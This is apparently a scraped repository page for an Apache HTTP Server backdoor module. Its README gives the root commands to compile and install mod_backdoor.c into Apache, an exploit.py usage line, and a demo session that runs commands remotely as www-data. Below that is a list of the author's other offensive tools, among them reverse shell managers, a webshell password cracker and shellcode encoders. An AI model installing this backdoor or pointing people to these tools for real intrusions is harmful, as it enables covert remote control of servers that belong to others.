• Stars
    star
    151
  • Rank 246,057 (Top 5 %)
  • Language
    C
  • Created about 7 years ago
  • Updated 3 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

👺 A Simple Backdoor For Apache HTTP Server

Apache_HTTP_Server_Module_Backdoor

Installation:

# switch to root user
apt install apache2-dev && apxs -i -a -c mod_backdoor.c && service apache2 restart

Usage:

python exploit.py [HOST] [PORT]

Example:

root@kali:~/backdoor# apxs -i -a -c mod_backdoor.c && service apache2 restart
/usr/share/apr-1.0/build/libtool  --mode=compile --tag=disable-static x86_64-linux-gnu-gcc -prefer-pic -pipe -g -O2 -fstack-protector-strong -Wformat -Werror=format-security  -Wdate-time -D_FORTIFY_SOURCE=2   -DLINUX -D_REENTRANT -D_GNU_SOURCE  -pthread  -I/usr/include/apache2  -I/usr/include/apr-1.0   -I/usr/include/apr-1.0 -I/usr/include  -c -o mod_backdoor.lo mod_backdoor.c && touch mod_backdoor.slo
libtool: compile:  x86_64-linux-gnu-gcc -pipe -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -DLINUX -D_REENTRANT -D_GNU_SOURCE -pthread -I/usr/include/apache2 -I/usr/include/apr-1.0 -I/usr/include/apr-1.0 -I/usr/include -c mod_backdoor.c  -fPIC -DPIC -o .libs/mod_backdoor.o
/usr/share/apr-1.0/build/libtool  --mode=link --tag=disable-static x86_64-linux-gnu-gcc -Wl,--as-needed -Wl,-z,relro -Wl,-z,now    -o mod_backdoor.la  -rpath /usr/lib/apache2/modules -module -avoid-version    mod_backdoor.lo
libtool: link: rm -fr  .libs/mod_backdoor.la .libs/mod_backdoor.lai .libs/mod_backdoor.so
libtool: link: x86_64-linux-gnu-gcc -shared  -fPIC -DPIC  .libs/mod_backdoor.o    -Wl,--as-needed -Wl,-z -Wl,relro -Wl,-z -Wl,now   -Wl,-soname -Wl,mod_backdoor.so -o .libs/mod_backdoor.so
libtool: link: ( cd ".libs" && rm -f "mod_backdoor.la" && ln -s "../mod_backdoor.la" "mod_backdoor.la" )
/usr/share/apache2/build/instdso.sh SH_LIBTOOL='/usr/share/apr-1.0/build/libtool' mod_backdoor.la /usr/lib/apache2/modules
/usr/share/apr-1.0/build/libtool --mode=install install mod_backdoor.la /usr/lib/apache2/modules/
libtool: install: install .libs/mod_backdoor.so /usr/lib/apache2/modules/mod_backdoor.so
libtool: install: install .libs/mod_backdoor.lai /usr/lib/apache2/modules/mod_backdoor.la
libtool: finish: PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/sbin" ldconfig -n /usr/lib/apache2/modules
----------------------------------------------------------------------
Libraries have been installed in:
   /usr/lib/apache2/modules

If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the '-LLIBDIR'
flag during linking and do at least one of the following:
   - add LIBDIR to the 'LD_LIBRARY_PATH' environment variable
     during execution
   - add LIBDIR to the 'LD_RUN_PATH' environment variable
     during linking
   - use the '-Wl,-rpath -Wl,LIBDIR' linker flag
   - have your system administrator add LIBDIR to '/etc/ld.so.conf'

See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------
chmod 644 /usr/lib/apache2/modules/mod_backdoor.so
[preparing module `backdoor' in /etc/apache2/mods-available/backdoor.load]
Module backdoor already enabled
root@kali:~/backdoor# python exploit.py 127.0.0.1 80
$ whoami
www-data

$ uname -a
Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux

$ exit

License

THE DRINKWARE LICENSE

<[email protected]> wrote this file. As long as 
you retain this notice you can do whatever you want 
with this stuff. If we meet some day, and you think 
this stuff is worth it, you can buy me the following
drink(s) in return.

Red Bull
JDB
Coffee
Sprite
Cola
Harbin Beer
etc

More Repositories

1

Platypus

🔨 A modern multiple reverse shell sessions manager written in go
Go
1,503
star
2

GitHacker

🕷️ A `.git` folder exploiting tool that is able to restore the entire Git repository, including stash, common branches and common tags.
Python
1,408
star
3

Webshell-Sniper

🔨 Manage your website via terminal
Python
419
star
4

SourceLeakHacker

🐛 A multi threads web application source leak scanner
Python
379
star
5

ccupp

基于社会工程学的弱口令密码字典生成工具
Python
340
star
6

UsbKeyboardDataHacker

USB键盘流量包取证工具 , 用于恢复用户的击键信息
Python
320
star
7

Reverse-Shell-Manager

🔨 A multiple reverse shell session/client manager via terminal
Python
237
star
8

USB-Mouse-Pcap-Visualizer

USB mouse traffic packet forensic tool, mainly used to draw mouse movements and dragging trajectories
JavaScript
233
star
9

Exploit-Framework

🔥 An Exploit framework for Web Vulnerabilities written in Python
Python
170
star
10

MIT-6.031-Readings-zh-cn

麻省理工大学-18年春季学期-软件构造(6.031)课程阅读中文版
84
star
11

awesome-web-security

📓 Some notes and impressive articles of Web Security
74
star
12

Codiad-Remote-Code-Execute-Exploit

A simple exploit to execute system command on codiad
Python
64
star
13

Find-PHP-Vulnerabilities

🐛 A plug-in of sublime 2/3 which is able to find PHP vulnerabilities
Python
56
star
14

PwnMe

二进制渗透题目汇总
Python
54
star
15

IdiomsSolitaire

成语接龙
Python
48
star
16

sqli-labs

WriteUp of sqli-labs (GitBook : https://www.gitbook.com/book/wangyihang/sqli-labs/details)
39
star
17

12306

12306网站抢票Python脚本
Python
28
star
18

WebShellCracker

WebShell密码爆破工具
Python
19
star
19

LinuxShellScript

LinuxShell编程笔记
Shell
15
star
20

SQL-Hacker

简单SQL注入工具
Python
14
star
21

XorShellcode

Shellcode异或加密工具
Python
12
star
22

Subdomain-Crawler

A program for collecting subdomains of a list of given second-level domains (SLD)
Go
12
star
23

ShellcodeSpider

Shellcode Spider of Exploit-DB
C
12
star
24

HIT-Courses-Calendar

哈尔滨工业大学教务处课表Excel转换iCal脚本
Python
10
star
25

gojob

Go(od) Job is a simple job scheduler that supports task retries, logging, and task sharding.
Go
10
star
26

Proxy-Verifier

A set of tools designed to efficiently and effectively locate publicly available proxy server resources.
Go
9
star
27

PPT-Generator

Generate PPT via a simple summary
Python
9
star
28

tplayer

一个Linux终端播放器 , 使用字符绘制图片/视频 , 并按照帧率播放
Python
8
star
29

Presentations

8
star
30

t3sec-network-flow-analysis

6
star
31

acw-sc-v2.js

`acw_sc__v2` cookie generator
HTML
5
star
32

Docker-Container-Exposer

Expose docker containers to public network
Shell
5
star
33

pickle-pickle

A arbitary python code executer via python pickle
Python
5
star
34

CrackMe

CrackMe 汇总
Python
5
star
35

Platypus-Python

Python
5
star
36

SimpleEncrypter

简单shellcode加密工具(存在 0 字节)
Python
4
star
37

Markdown-URL-to-Title

Python
4
star
38

DBLP-Spider

A spider tool for downloading the DBLP search results into local BibTeX files.
Python
4
star
39

MovieSearcher

电影资源搜索工具
Python
3
star
40

Image-LSB-Stego

Python
3
star
41

http-grab

Go
2
star
42

tranco-go-package

Go
2
star
43

acw-sc-v2-py

Python requests.HTTPAdapter for `acw_sc__v2`
Python
2
star
44

dns-grab

Go
2
star
45

PrintableShellcodeCreator

可打印shellcode生成工具
C
2
star
46

DBAPPSecurity-Unified-Security-Management-Python-Connector

Python Connector for DBAPPSecurity Unified Security Management | 明御®运维审计与风险控制系统(堡垒机)
Python
1
star
47

bgphenet

Go
1
star
48

acw-sc-v2-go

Go
1
star
49

ModifyHeadersForChrome

ModifyHeadersForChrome
JavaScript
1
star
50

ProcessInjector

C
1
star
51

JBrowserWithPulgins

Java实现的一个简单的Web浏览器 , 提供了插件功能 , 目前插件有下载地址分析器
Java
1
star